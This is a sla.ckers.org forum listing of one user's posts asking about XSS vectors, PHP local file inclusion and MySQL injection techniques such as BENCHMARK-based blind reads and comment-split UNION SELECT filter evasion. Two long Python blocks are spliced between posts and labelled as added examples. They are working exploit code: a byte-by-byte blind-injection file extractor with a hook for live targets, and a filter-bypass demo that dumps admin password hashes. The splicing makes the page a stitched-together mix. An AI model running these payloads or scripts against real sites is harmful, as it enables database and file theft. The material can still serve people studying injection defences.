Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Pages: 1 2 Next
Current Page: 1 of 2
Results 1 - 30 of 40
1 year ago
choronzon
The app is not vulnerable to header injection :,-( Any other suggestions? Thanks.
Forum: XSS Info
1 year ago
choronzon
Hi folks, I found an XSS like this:

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Location: http://localhost/<script>alert(123)</script>

<a href='http://localhost/<script>alert(123)</script>'>http://localhost/<script>alert(123)</script></a>

but I can't obtain JS execution.. is there any way to let the b
Forum: XSS Info
2 years ago
choronzon
Hello, I have an XSS like this:

POST /...
Host: server
...
par=<XSS>

HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8
...
{"par":"<XSS>"}

Client-side code execution can be obtained with IE, but I need a working vector for FF or Chrome. Any suggestions? Thanks, c.
Forum: XSS Info
3 years ago
choronzon
Thanks for your vector, but as I mentioned "(" and ")" are filtered!
Forum: XSS Info
3 years ago
choronzon
Hello, I'm working on some challenging XSS: filtered chars == ),(,>,<

<script type="text/javascript" src="/pathINJECTION_POINT.js"></script>

Injection example:

<script type="text/javascript" src="/path" myField="aaa" crap="xyz.js"></script>

Something similar here: <html xmlns="http://w
Forum: XSS Info
3 years ago
choronzon
Hello, I need to exploit these XSS injections. Please consider that I need to execute JS code under Firefox (>3.6.x). The following are the injection points:

1) <link rel="crap" type="application/rss+xml" title="INJECTION" href="...">

We can inject a new attribute: <link rel="crap" type="application/rss+xml" title=
Forum: XSS Info
4 years ago
choronzon
Hi guys, here is my question. Let's assume we have to exploit this code:

<? include "/some/path/" . $_GET["name"]; // ... ?>

But also assume that we can't include any content-controlled file (such as Apache's logs, because of permissions), nor include other daemon logs (ftp/sshd/etc), nor include /proc/XXX stuff (I think Ubuntu is a place where all thes
Forum: SQL and Code Injection
4 years ago
choronzon
It would be fantastic to make a script include a reflected input, but it doesn't work :-(

lfi.php?file=cgi-bin/xss.php?xss=<?php phpinfo(); ?>

--> Can you explain to me under which conditions you were able to make it work? Thank you
Forum: SQL and Code Injection
5 years ago
choronzon
> Use ../../ to backtrack Ok, that works! Thank you.
Forum: SQL and Code Injection
5 years ago
choronzon
> I buy a nullbyte - in case magic_quotes is off.

Eheh, that's OK to cut off the ".php" string, BUT what about the "script" string? Try again :-)
Forum: SQL and Code Injection
5 years ago
choronzon
Are there any ways to remotely exploit this local file inclusion? (Or better, a way to skip the first part of the script name?):

include ("/some_path/script" . $_GET["lang"] . ".php");

Thank you.
Forum: SQL and Code Injection
5 years ago
choronzon
Regardless of the (DB) content, if the site you mentioned is running ASP + MS SQL Server you should try to execute remote commands with this nice tool: http://sqlninja.sourceforge.net/
Forum: SQL and Code Injection
5 years ago
choronzon
> Does someone know any trick to bypass that? Thanks
> in advance :)

Hi, I had a look at your anti-hack script and this is my solution. As you can see, you can't read data with a canonical UNION SELECT injection because of the stripos() action. There is (I didn't find) no way to bypass this filter and use the SELECT. BUT if you have read permissions you can read data from the .MYD fi
Forum: SQL and Code Injection
6 years ago
choronzon
I don't have a paper about this, but a friend of mine just wrote this post about INTO OUTFILE: http://www.webapptest.org/index.php?entry=entry070910-130659 Bye
Forum: SQL and Code Injection
6 years ago
choronzon
In this (http://www.milw0rm.com/papers/149) interesting paper, the author used a MySQL error message ("Subquery returns more than 1 row") to play with (not so) blind injection. I would like to know if there are any other MySQL error messages that can be triggered only AFTER the execution of the query (such as the subquery stuff). Thanks --chrnzn
Forum: SQL and Code Injection
6 years ago
choronzon
Hi, are there any interesting ways to use a UDF (User-Defined Function) with SQL injection under PHP/MySQL? I mean a real attack, not only a hypothesis :-) Thanks -choronzon
Forum: SQL and Code Injection
6 years ago
choronzon
Naaa.. I know how to read a script, read information_schema or brute-force :-) I would like to find a way to find the table name, maybe through some messages displayed by mysql_error().
Forum: SQL and Code Injection
6 years ago
choronzon
Permissions apart, INTO OUTFILE/DUMPFILE can't be used to overwrite files. It is a security feature of MySQL :-P
Forum: SQL and Code Injection
6 years ago
choronzon
The problem is that only SELECT subqueries are allowed.. so there is no way to insert data into tables. chrnzn
Forum: SQL and Code Injection
6 years ago
choronzon
(Talking about MySQL + PHP) I was thinking about a way to find the name of the table selected by the injectable query without brute-forcing it. Are there any tricks? (Assume we have a visible injection.) Thank you, choronzon
Forum: SQL and Code Injection
6 years ago
choronzon
> And yes, you can inject it. I don't see the problem here, I could inject whatever
> I want for that matter.

Naaa... this is impossible. But one moment: I'm talking about MySQL + PHP. What are you talking about?
Forum: SQL and Code Injection
6 years ago
choronzon
Sure, this is obvious, BUT we are talking about SQL INJECTION, not MySQL's console commands. There is NO way to inject that command, so it is useless in (My)SQL injection. That is just what I wanted to say. chrnzn
Forum: SQL and Code Injection
6 years ago
choronzon
I don't know which magical version of MySQL you are using :) but on my MySQL if I type:

[---]
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1
Server version: 5.0.45-community-nt MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>
mysql> select show variables;
ERROR 1064 (42000): You have an erro
Forum: SQL and Code Injection
7 years ago
choronzon
> DESCRIBE <table>
> SHOW VARIABLES

I think these are impossible to use in a SQL injection ;)
Forum: SQL and Code Injection
7 years ago
choronzon
> thanks choronzon, I am trying it, but the db user
> doesn't have FILE permission and the whole site
> doesn't have any users/passwords (db) thing, they just
> have admin pages in a folder protected by
> (apache) user/password. so it's useless without
> accessing the file system :(

Uhm.. so no read permission.. and I think it is quite obvious that you don't have write permission (unio
Forum: SQL and Code Injection
7 years ago
choronzon
The answer is very simple: you can use the blind techniques to infer data from the DB, exploiting the first query. You can read data byte-per-byte by using the BENCHMARK() technique. Just append to the URL something like:

666 and (if(mid(load_file(file_name_hex_encoded),X,1)=Y, BENCHMARK(..), 0))

If the X-th char of the file_name_hex_encoded is equal to Y, you guess the char. If it happe
Forum: SQL and Code Injection
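The byte-at-a-time BENCHMARK() extraction described in the post above, as an added example (this is not code from the thread or from choronzon). It builds payloads of the same shape, `666 and if(<cond>, benchmark(..), 0)` with the filename as a 0x hex literal, and wraps `ascii()` around `mid()` so a byte can be compared as a number: that keeps the post's `=` scan available and also allows a `>` comparison, which finds each byte in 8 requests by bisection instead of one candidate per request. There is no live target here: `simulated_oracle` parses the payload it receives and answers from a constructed `SAMPLE_FILE`, while `timing_oracle` shows how the same loop would be driven by response time against a real page (the `send` function that issues the HTTP request is assumed, not provided). The path, the `666` id value and the benchmark iteration count are assumptions.

```python
import re
import time
from typing import Callable

# Constructed stand-in for the file a real target would hand back from
# load_file(); not data from any real system.
SAMPLE_PATH = "/etc/passwd"
SAMPLE_FILE = "root:x:0:0:root:/root:/bin/bash\n"

BENCHMARK_ITERS = 5_000_000  # assumption: tune until the TRUE branch is measurably slower


def hex_literal(s: str) -> str:
    """MySQL 0x... literal: lets the filename travel without quote characters."""
    return "0x" + s.encode().hex()


def build_payload(path: str, pos: int, op: str, value: int) -> str:
    """Payload in the shape of the post: <id> and if(<cond>, BENCHMARK(..), 0).
    ascii() is wrapped around mid() so the byte can be compared as a number,
    which allows '>' (bisection) as well as the post's '=' (one candidate per
    request). 666 is the injectable id value, as in the post (assumed)."""
    if op not in ("=", ">"):
        raise ValueError("op must be '=' or '>'")
    cond = f"ascii(mid(load_file({hex_literal(path)}),{pos},1)){op}{value}"
    return f"666 and if({cond}, benchmark({BENCHMARK_ITERS}, md5(1)), 0)"


def timing_oracle(send: Callable[[str], None], threshold_s: float) -> Callable[[str], bool]:
    """Turn a request function into a truth oracle: slow response => cond true.
    `send` is whatever issues the HTTP request with the payload appended to
    the URL (assumed; not provided here)."""
    def is_true(payload: str) -> bool:
        start = time.monotonic()
        send(payload)
        return time.monotonic() - start > threshold_s
    return is_true


_PAYLOAD_RE = re.compile(r"mid\(load_file\(0x([0-9a-f]+)\),(\d+),1\)\)(=|>)(\d+)")


def simulated_oracle(payload: str) -> bool:
    """Offline stand-in for the injectable page. Parses the payload it is
    given and evaluates the condition against SAMPLE_FILE, mimicking MySQL:
    mid() past the end gives '', ascii('') is 0, and load_file() on an
    unreadable path gives NULL so the comparison is never true."""
    m = _PAYLOAD_RE.search(payload)
    if m is None:
        raise ValueError("unrecognised payload")
    path = bytes.fromhex(m.group(1)).decode()
    pos, op, value = int(m.group(2)), m.group(3), int(m.group(4))
    if path != SAMPLE_PATH:
        return False  # NULL comparison is never true
    byte = ord(SAMPLE_FILE[pos - 1]) if pos <= len(SAMPLE_FILE) else 0
    return byte == value if op == "=" else byte > value


def extract_file(path: str, oracle: Callable[[str], bool], max_len: int = 4096) -> str:
    """Read the file byte by byte. Each byte costs 8 requests: bisection on
    0..255 with the '>' comparison. A byte of 0 marks the end of the file."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build_payload(path, pos, ">", mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


def extract_with_count(path: str, oracle: Callable[[str], bool]):
    """Same extraction, also returning how many requests it took."""
    calls = [0]

    def counting(p: str) -> bool:
        calls[0] += 1
        return oracle(p)

    return extract_file(path, counting), calls[0]


if __name__ == "__main__":
    content, n = extract_with_count(SAMPLE_PATH, simulated_oracle)
    print(f"{n} requests -> {content!r}")
```

Against a live target the threshold passed to `timing_oracle` has to be calibrated first (measure a few known-true and known-false payloads), and a false answer caused by network jitter corrupts every later bisection step for that byte, so repeating each request and taking the majority is the usual defence.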
7 years ago
choronzon
Ah OK. As I said before, I found somewhere an article from MS where it is mentioned that by default there is a sandbox on that doesn't permit you to execute that type of function. I remember that the sandbox was enabled using a Windows registry key. SO no way to bypass this thing. :-( Bye, chrnzn
Forum: SQL and Code Injection
7 years ago
choronzon
I can tell you that I read that some functions such as shell() can only be used if there are some special settings (a sort of sandbox off; it is set on by default :( so you can just use some useless functions such as time(), etc..). Can you give me more info about the use of shell()? Ah, at last I think the better way is to try to brute-force the table name in the DB, and then crack the pwd for admin access. by
Forum: SQL and Code Injection
7 years ago
choronzon
Hi Gustavo, I tried to play with that info but I think most (or all :P) of it is useless. First of all I looked at these tables (I tested them on a simple DB with default options): MSysACEs, MSysObjects, MSysQueries, MSysRelationships. By using MSysObjects you could extract info such as what can be extracted from information_schema under other DBMSs, BUT by default access on it (a
Forum: SQL and Code Injection
7 years ago
choronzon
Try something like this:

UnIOn/*ahhauhuwhwdwiud83ye83*/SeLecT/*ud37due3hd*/table_name etc..

Maybe the filter is not case sensitive. --chrnzn
Forum: SQL and Code Injection
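The comment-split UNION SELECT from the post above, and the stripos()-style "anti-hack" filter it defeats from the earlier post about the .MYD files, as an added example (not code from the thread or from choronzon). SQLite stands in for the thread's MySQL so the example runs offline: like MySQL it treats `/* ... */` between tokens as whitespace, and `sqlite_master` plays the role of `information_schema` for the `table_name` enumeration. The schema, the `news`/`admin_users` tables and the filter logic are constructed for the demonstration. The keyword filter is paired with the fix a naive filter is a stand-in for: type validation plus a bound parameter.

```python
import sqlite3

# Constructed demo schema standing in for the target DB of the thread.
DDL = """
CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO news VALUES (1, 'hello'), (2, 'world');
CREATE TABLE admin_users(id INTEGER PRIMARY KEY, login TEXT, pwhash TEXT);
INSERT INTO admin_users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def open_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(DDL)
    return con


def naive_filter(user_input: str) -> bool:
    """Mimics a stripos()-style 'anti-hack' check: allow the input unless the
    exact phrase 'union select' occurs (case-insensitive). It only knows the
    two keywords separated by a single space."""
    return "union select" not in user_input.lower()


def vulnerable_query(con: sqlite3.Connection, user_id: str):
    """String-concatenated query behind the filter: the thread's injection point."""
    if not naive_filter(user_id):
        raise PermissionError("blocked by filter")
    return con.execute(f"SELECT id, title FROM news WHERE id = {user_id}").fetchall()


def safe_query(con: sqlite3.Connection, user_id: str):
    """The real fix: enforce the type, then bind the value. No keyword list."""
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return con.execute("SELECT id, title FROM news WHERE id = ?", (uid,)).fetchall()


# Payloads (constructed). PLAIN is what the filter was written against; the
# others separate the two keywords with a comment or a newline, so the phrase
# the filter looks for never appears while the SQL parser sees the same tokens.
PLAIN = "1 UNION SELECT login, pwhash FROM admin_users"
COMMENT_SPLIT = "1 UnIOn/*ahhauhuwhwdwiud83ye83*/SeLecT/*ud37due3hd*/login, pwhash FROM admin_users"
NEWLINE_SPLIT = "1 UNION\nSELECT login, pwhash FROM admin_users"
# sqlite_master here plays the part of information_schema.tables
TABLE_NAMES = "1 UNION/**/SELECT name, type FROM sqlite_master WHERE type='table'"


def dump_admins(con: sqlite3.Connection):
    """Rows of admin_users pulled through the filtered, injectable query."""
    return [r for r in vulnerable_query(con, COMMENT_SPLIT) if r[0] == "admin"]


def enumerate_tables(con: sqlite3.Connection):
    """Table names pulled the same way, the thread's table_name trick."""
    return sorted(r[0] for r in vulnerable_query(con, TABLE_NAMES) if r[1] == "table")


if __name__ == "__main__":
    db = open_db()
    print("plain payload allowed by filter:", naive_filter(PLAIN))
    print("comment-split allowed by filter:", naive_filter(COMMENT_SPLIT))
    print("tables:", enumerate_tables(db))
    print("admins:", dump_admins(db))
    print("same payload via bound parameter:", safe_query(db, COMMENT_SPLIT))
```

The point of the pairing is that the blacklist cannot be patched into correctness: after `/**/` comes a tab, a newline, `UNION ALL SELECT`, or a different keyword altogether, and each is another phrase to add. Binding the value removes the class of problem rather than one payload.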